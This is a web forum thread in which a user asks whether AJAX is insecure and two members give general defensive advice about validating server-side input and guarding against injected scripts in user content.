Results 1 to 3 of 3

Thread: is ajax is hackable?

  1. #1
    Join Date
    Dec 2011
    Posts
    1
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default is ajax is hackable?

    Hi,

    I want to make some port of website in ajax but i heard that it is hackable so is there any way to make it more secure.I am using server base scripts til now but ajax is faster.

    thanks

  2. #2
    Join Date
    Mar 2005
    Location
    SE PA USA
    Posts
    30,495
    Thanks
    82
    Thanked 3,449 Times in 3,410 Posts
    Blog Entries
    12

    Default

    It depends upon what you're doing with it. All javascript is hackable, in that a person may use the browser's console or scratch pad to inject their own code into the AJAX call. But this only means that they may post or get with it whatever they want from your domain's public areas. Security of those items is your responsibility. Like if your AJAX code runs a PHP script or page that includes something based upon what's sent via AJAX, make sure that only certain values are actionable, don't allow it to include say - any file, give options as to which among a selection of files it might include. If it sends email, give a selection of email addresses in the PHP part that it may send to based upon what AJAX passes it, do not allow it to send to any email address that's passed from AJAX. Those sorts of things.

    For your particular application, ask yourself the question, "If I wanted to use this to do something other than it's intended to do, by changing the data sent with the call, what could I make it do?" Keep in mind that if your call is a POST, it could be changed to include GET data or to be only GET, and visa versa. And of course that the data sent can be changed to anything the would be hacker chooses.

    This is not all that different than an ordinary form submission or server side link with a query string. A hacker may make up their own link or form and pass/submit it to your PHP page or script. If that PHP code will do anything the form or link tells it to do, you could have trouble.
    Last edited by jscheuer1; 08-29-2013 at 03:04 PM. Reason: add info
    - John
    ________________________

    Show Additional Thanks: International Rescue Committee - Donate or: The Ocean Conservancy - Donate or: PayPal - Donate

  3. #3
    Join Date
    Mar 2006
    Location
    Illinois, USA
    Posts
    12,164
    Thanks
    265
    Thanked 690 Times in 678 Posts

    Default

    Ajax is a way to combine serverside and clientside code. Clientside code is inherently insecure, at least because it can be modified by the client. But that doesn't mean it can be "hacked" by someone else, any more than anything else on their computer could be hacked.
    Serverside code, generally, can't be hacked, because it operates on the server-- of course your server could be hacked.
    So then there's a question of whether the content requested by Ajax is actually the content you receive. But since both ends aren't really possible to change without access to the user's computer or your server, I don't see why this would be a problem.

    So in theory, no. But there are always possibilities of anything having a security problem. For example, someone could guess your admin password and change settings on your server.

    The most common kind of attack would be one in which you allow comments or other kinds of content modification from users; then they could add in some potentially harmful Javascript (including Ajax) code so that visitors would have code they (and you) don't want on the page.


    The only "security" feature in Ajax is that cross-domain requests (eg, Ajax code on Google asking to load content from Yahoo) is blocked in most (all modern) browsers. That's generally helpful in preventing (such as in user comments) outside content from being loaded.


    So in addition to what John said, we'll need more info about exactly what you're doing with the code and what vulnerabilities it might have. In general, there isn't too much to worry about, beyond normal security precautions.
    Daniel - Freelance Web Design | <?php?> | <html>| espa˝ol | Deutsch | italiano | portuguŕs | catalÓ | un peu de franšais | some knowledge of several other languages: I can sometimes help translate here on DD | Linguistics Forum

Similar Threads

  1. Resolved best practice login (secure data) via ajax - POST JSON AJAX
    By lse123 in forum JavaScript
    Replies: 12
    Last Post: 01-01-2013, 12:22 AM
  2. Replies: 5
    Last Post: 08-09-2012, 12:10 PM
  3. DHTML CrossBrowser Ajax Simulator - Ajax-style photo uploading example
    By diltony in forum Submit a DHTML or CSS code
    Replies: 4
    Last Post: 01-08-2012, 12:07 PM
  4. Ajax Tabs Content Script (v 2.2) with ajax form submit
    By dd8081 in forum Dynamic Drive scripts help
    Replies: 0
    Last Post: 08-10-2009, 08:21 PM
  5. [Ajax] Ajax Messages (Ajax Demonstration)
    By iMarc in forum Submit a DHTML or CSS code
    Replies: 2
    Last Post: 03-22-2007, 03:31 AM

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •